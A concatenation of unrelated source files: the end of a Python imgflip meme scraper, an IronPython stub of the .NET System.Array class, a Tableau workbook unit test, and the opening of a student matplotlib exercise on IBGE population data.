print(f"Fetched: {len(fetched_templates)} templates. Found {errors} error(s).")
return fetched_templates
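# Each record in the returned list is a plain dict with the keys
# "id", "format", "website", "url" and "title" (see template_data above);
# __main__ converts the list into a pandas DataFrame and appends it to a .tsv.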
def process_imgflip(args):
'''
https://gist.github.com/WalterSimoncini/defca6de456bb168ada303085358bf0a
'''
fetched_memes = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
# print(f"Processing page {i}")
response = requests.get(f"{args.source_url}?page={i}")
body = BeautifulSoup(response.text, 'html.parser')
if response.status_code != 200:
# print("Something went wrong!")
break # Something went wrong (e.g. page limit)
memes = body.findAll("div", {"class": "base-unit clearfix"})
for meme in memes:
if "not-safe-for-work images" in str(meme):
continue # NSFW memes are available only to logged in users
try:
meme_url = 'https://'+meme.find("img", {"class": "base-img"})["src"][2:]
meme_id, meme_format = os.path.splitext(meme_url.split("/")[-1])
# Handle anonymous authors
meme_author = meme.find("a", {"class": "u-username"})
meme_author = "anonymous" if meme_author is None else meme_author.text
# Handle empty titles
meme_title = meme.find("h2", {"class": "base-unit-title"}).find("a")
meme_title = "" if meme_title is None else meme_title.text
meme_text = meme.find("img", {"class": "base-img"})["alt"]
meme_text = meme_text.split("|")[1].strip()
meme_data = {
"id": meme_id,
"format": meme_format,
"website": "imgflip",
"url": meme_url,
"author": meme_author,
"title": meme_title,
"text": meme_text.lower()
}
fetched_memes.append(meme_data)
except Exception:
# Count and skip memes that are missing expected elements.
errors += 1
time.sleep(args.delay)
print(f"Fetched: {len(fetched_memes)} memes. Found {errors} error(s).")
return fetched_memes
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
# ap.add_argument("--source_url", default="https://imgflip.com/tag/programming", help="Memes list url (e.g. https://imgflip.com/meme/Bird-Box)", type=str)
ap.add_argument("--tag", required=True, type=str)#default=['programming', 'artificial intelligence', 'computer'], type=list)
ap.add_argument("--from_page", default=1, help="Initial page", type=int)
ap.add_argument("--pages", default=44, help="Maximum page number to be scraped", type=int)
ap.add_argument("--delay", default=2, help="Delay between page loads (seconds)", type=int)
ap.add_argument("-o", "--output", default="templates.tsv")
args = ap.parse_args()
# category = args.source_url.split("/")[-1].replace("-", " ")
# Get the data
data = {}
# for tag in args.tags:
print(f"Processing tag: {args.tag}")
# Get the data
# args.source_url = f"https://imgflip.com/tag/{args.tag.replace(' ', '+')}"
# data = process_imgflip(args)
# args.source_url = f"https://ww.9gag.com/search/?query={args.tag.replace(' ', '+')}"
# data = process_9gag(args)
data = templates_imgflip(args)
# Create a pd.DataFrame and save (append to existing .tsv)
df = pd.DataFrame(data)
print(df.head(20))
df.to_csv(args.output, sep='\t', index=False, mode='a')
|
class Array(object,ICloneable,IList,ICollection,IEnumerable,IStructuralComparable,IStructuralEquatable):
""" Provides methods for creating,manipulating,searching,and sorting arrays,thereby serving as the base class for all arrays in the common language runtime. """
@staticmethod
def AsReadOnly(array):
""" AsReadOnly[T](array: Array[T]) -> ReadOnlyCollection[T] """
pass
@staticmethod
def BinarySearch(array,*__args):
"""
BinarySearch[T](array: Array[T],value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],value: T) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T) -> int
BinarySearch(array: Array,index: int,length: int,value: object) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the System.IComparable interface implemented by each element of
the System.Array and by the specified value.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object) -> int
Searches an entire one-dimensional sorted System.Array for a specific element,
using the System.IComparable interface implemented by each element of the
System.Array and by the specified object.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,index: int,length: int,value: object,comparer: IComparer) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object,comparer: IComparer) -> int
Searches an entire one-dimensional sorted System.Array for a value using the
specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
"""
pass
@staticmethod
def Clear(array,index,length):
"""
Clear(array: Array,index: int,length: int)
Sets a range of elements in the System.Array to zero,to false,or to null,
depending on the element type.
array: The System.Array whose elements need to be cleared.
index: The starting index of the range of elements to clear.
length: The number of elements to clear.
"""
pass
def Clone(self):
"""
Clone(self: Array) -> object
Creates a shallow copy of the System.Array.
Returns: A shallow copy of the System.Array.
"""
pass
@staticmethod
def ConstrainedCopy(sourceArray,sourceIndex,destinationArray,destinationIndex,length):
"""
ConstrainedCopy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. Guarantees that all changes are undone if the copy does not
succeed completely.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
@staticmethod
def ConvertAll(array,converter):
""" ConvertAll[(TInput,TOutput)](array: Array[TInput],converter: Converter[TInput,TOutput]) -> Array[TOutput] """
pass
@staticmethod
def Copy(sourceArray,*__args):
"""
Copy(sourceArray: Array,destinationArray: Array,length: Int64)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 64-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,sourceIndex: Int64,destinationArray: Array,destinationIndex: Int64,length: Int64)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 64-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 64-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 64-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,destinationArray: Array,length: int)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 32-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 32-bit integer that represents the number of elements to copy.
Copy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 32-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
def CopyTo(self,array,index):
"""
CopyTo(self: Array,array: Array,index: Int64)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 64-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 64-bit integer that represents the index in array at which copying begins.
CopyTo(self: Array,array: Array,index: int)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 32-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 32-bit integer that represents the index in array at which copying begins.
"""
pass
@staticmethod
def CreateInstance(elementType,*__args):
"""
CreateInstance(elementType: Type,*lengths: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 32-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 32-bit integers that represent the size of each dimension of the
System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,*lengths: Array[Int64]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 64-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 64-bit integers that represent the size of each dimension of the
System.Array to create. Each integer in the array must be between zero and
System.Int32.MaxValue,inclusive.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,lengths: Array[int],lowerBounds: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with the specified lower bounds.
elementType: The System.Type of the System.Array to create.
lengths: A one-dimensional array that contains the size of each dimension of the
System.Array to create.
lowerBounds: A one-dimensional array that contains the lower bound (starting index) of each
dimension of the System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length and lower bound for each dimension.
CreateInstance(elementType: Type,length: int) -> Array
Creates a one-dimensional System.Array of the specified System.Type and length,
with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length: The size of the System.Array to create.
Returns: A new one-dimensional System.Array of the specified System.Type with the
specified length,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int) -> Array
Creates a two-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
Returns: A new two-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int,length3: int) -> Array
Creates a three-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
length3: The size of the third dimension of the System.Array to create.
Returns: A new three-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
"""
pass
@staticmethod
def Empty():
""" Empty[T]() -> Array[T] """
pass
@staticmethod
def Exists(array,match):
""" Exists[T](array: Array[T],match: Predicate[T]) -> bool """
pass
@staticmethod
def Find(array,match):
""" Find[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindAll(array,match):
""" FindAll[T](array: Array[T],match: Predicate[T]) -> Array[T] """
pass
@staticmethod
def FindIndex(array,*__args):
"""
FindIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def FindLast(array,match):
""" FindLast[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindLastIndex(array,*__args):
"""
FindLastIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def ForEach(array,action):
""" ForEach[T](array: Array[T],action: Action[T]) """
pass
def GetEnumerator(self):
"""
GetEnumerator(self: Array) -> IEnumerator
Returns an System.Collections.IEnumerator for the System.Array.
Returns: An System.Collections.IEnumerator for the System.Array.
"""
pass
def GetLength(self,dimension):
"""
GetLength(self: Array,dimension: int) -> int
Gets a 32-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 32-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLongLength(self,dimension):
"""
GetLongLength(self: Array,dimension: int) -> Int64
Gets a 64-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 64-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLowerBound(self,dimension):
"""
GetLowerBound(self: Array,dimension: int) -> int
Gets the lower bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose lower bound needs to be
determined.
Returns: The lower bound of the specified dimension in the System.Array.
"""
pass
def GetUpperBound(self,dimension):
"""
GetUpperBound(self: Array,dimension: int) -> int
Gets the upper bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose upper bound needs to be
determined.
Returns: The upper bound of the specified dimension in the System.Array.
"""
pass
def GetValue(self,*__args):
"""
GetValue(self: Array,index1: Int64,index2: Int64) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
GetValue(self: Array,index: Int64) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 64-bit integer.
index: A 64-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[Int64]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 64-bit integers.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: Int64,index2: Int64,index3: Int64) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index: int) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 32-bit integer.
index: A 32-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[int]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 32-bit integers.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: int,index2: int,index3: int) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index1: int,index2: int) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
"""
pass
@staticmethod
def IndexOf(array,value,startIndex=None,count=None):
"""
IndexOf[T](array: Array[T],value: T) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
IndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the first occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the first occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that extends
from the specified index to the last element.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
Returns: The index of the first occurrence of value within the range of elements in
array that extends from startIndex to the last element,if found; otherwise,
the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that starts at
the specified index and contains the specified number of elements.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
count: The number of elements in the section to search.
Returns: The index of the first occurrence of value within the range of elements in
array that starts at startIndex and contains the number of elements specified
in count,if found; otherwise,the lower bound of the array minus 1.
"""
pass
def Initialize(self):
"""
Initialize(self: Array)
Initializes every element of the value-type System.Array by calling the default
constructor of the value type.
"""
pass
@staticmethod
def LastIndexOf(array,value,startIndex=None,count=None):
"""
LastIndexOf[T](array: Array[T],value: T) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
LastIndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the last occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the last occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that extends
from the first element to the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
Returns: The index of the last occurrence of value within the range of elements in array
that extends from the first element to startIndex,if found; otherwise,the
lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that contains
the specified number of elements and ends at the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
count: The number of elements in the section to search.
Returns: The index of the last occurrence of value within the range of elements in array
that contains the number of elements specified in count and ends at startIndex,
if found; otherwise,the lower bound of the array minus 1.
"""
pass
@staticmethod
def Resize(array,newSize):
""" Resize[T](array: Array[T],newSize: int) -> Array[T] """
pass
@staticmethod
def Reverse(array,index=None,length=None):
"""
Reverse(array: Array,index: int,length: int)
Reverses the sequence of the elements in a range of elements in the
one-dimensional System.Array.
array: The one-dimensional System.Array to reverse.
index: The starting index of the section to reverse.
length: The number of elements in the section to reverse.
Reverse(array: Array)
Reverses the sequence of the elements in the entire one-dimensional
System.Array.
array: The one-dimensional System.Array to reverse.
"""
pass
def SetValue(self,value,*__args):
"""
SetValue(self: Array,value: object,index1: Int64,index2: Int64)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: Int64)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 64-bit integer.
value: The new value for the specified element.
index: A 64-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[Int64])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 64-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: Int64,index2: Int64,index3: Int64)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index1: int,index2: int)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: int)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 32-bit integer.
value: The new value for the specified element.
index: A 32-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[int])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 32-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: int,index2: int,index3: int)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to set.
"""
pass
@staticmethod
def Sort(*__args):
"""
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int)Sort[T](array: Array[T],comparer: IComparer[T])Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue])Sort[T](array: Array[T],index: int,length: int)Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int,comparer: IComparer[TKey])Sort[T](array: Array[T],comparison: Comparison[T])Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],comparer: IComparer[TKey])Sort[T](array: Array[T],index: int,length: int,comparer: IComparer[T])Sort[T](array: Array[T])Sort(array: Array,index: int,length: int)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the System.IComparable implementation of each element of the
System.Array.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(keys: Array,items: Array,index: int,length: int)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the System.IComparable implementation
of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(array: Array)
Sorts the elements in an entire one-dimensional System.Array using the
System.IComparable implementation of each element of the System.Array.
array: The one-dimensional System.Array to sort.
Sort(keys: Array,items: Array)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the System.IComparable implementation of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
Sort(array: Array,index: int,length: int,comparer: IComparer)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the specified System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,index: int,length: int,comparer: IComparer)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the specified
System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(array: Array,comparer: IComparer)
Sorts the elements in a one-dimensional System.Array using the specified
System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,comparer: IComparer)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the specified System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
"""
pass
@staticmethod
def TrueForAll(array,match):
""" TrueForAll[T](array: Array[T],match: Predicate[T]) -> bool """
pass
def __add__(self,*args):
""" x.__add__(y) <==> x+y """
pass
def __contains__(self,*args):
"""
__contains__(self: IList,value: object) -> bool
Determines whether the System.Collections.IList contains a specific value.
value: The object to locate in the System.Collections.IList.
Returns: true if the System.Object is found in the System.Collections.IList; otherwise,
false.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __hash__(self,*args):
""" x.__hash__() <==> hash(x) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __len__(self,*args):
""" x.__len__() <==> len(x) """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __mul__(self,*args):
""" x.__mul__(y) <==> x*y """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(pythonType: type,items: object) -> object
__new__(pythonType: type,items: ICollection) -> object
"""
pass
def __ne__(self,*args):
pass
def __radd__(self,*args):
""" __radd__(data1: Array,data2: Array) -> Array """
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: Array) -> str """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]=y """
pass
IsFixedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array has a fixed size.
Get: IsFixedSize(self: Array) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array is read-only.
Get: IsReadOnly(self: Array) -> bool
"""
IsSynchronized=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether access to the System.Array is synchronized (thread safe).
Get: IsSynchronized(self: Array) -> bool
"""
Length=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 32-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: Length(self: Array) -> int
"""
LongLength=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 64-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: LongLength(self: Array) -> Int64
"""
Rank=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the rank (number of dimensions) of the System.Array.
Get: Rank(self: Array) -> int
"""
SyncRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object that can be used to synchronize access to the System.Array.
Get: SyncRoot(self: Array) -> object
"""
|
import os.path
import unittest
import hashlib
from tableaudocumentapi import Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
TEST_TWB_FILE = os.path.join(
TEST_ASSET_DIR,
'group_test.twb'
)
TEST_TWB_FILE2 = os.path.join(
TEST_ASSET_DIR,
'add_user_filter_test.twb'
)
ACCESS_PERMISSIONS = os.path.join(
TEST_ASSET_DIR,
'access_permissions.csv'
)
class WorksheetTWB(unittest.TestCase):
def test_worksheet(self):
self.wb = Workbook(TEST_TWB_FILE)
self.worksheets = self.wb.worksheets
self.assertEqual('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.worksheets[0].datasources[0]['name'])
self.assertTrue(self.worksheets[0].slices.has_user_filter())
def test_adding_column_to_slices(self):
print("test_adding_column_to_slices")
with open(ACCESS_PERMISSIONS) as f:
self.csv2 = f.read()
self.wb2 = Workbook(TEST_TWB_FILE2)
self.assertEqual(2,len(self.wb2.worksheets))
self.assertEqual('Sheet 1', self.wb2.worksheets[0].name)
self.assertEqual('[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[none:Advertiser:nk]', self.wb2.worksheets[0].slices.columns[0])
self.assertFalse(self.wb2.worksheets[0].slices.has_user_filter())
self.wb2.ingest_access_permissions('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.csv2)
self.assertEqual("[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[User Filter 1]",self.wb2.worksheets[0].slices.columns[0])
self.assertTrue(self.wb2.worksheets[0].slices.has_user_filter())
|
# -*- coding: utf-8 -*-
# Exercise list 06
# Exercise 4
# importing the libraries
import matplotlib.pyplot as plt
import numpy as np
# table data for the male and female populations (IBGE)
idade = np.array(
["0 a 4 anos", "5 a 9 anos", "10 a 14 anos", "15 a 19 anos", "20 a 24 anos", "25 a 29 anos",
"30 a 34 anos", "35 a 39 anos", "40 a 44 anos", "45 a 49 anos", "50 a 54 anos", "55 a 59 anos",
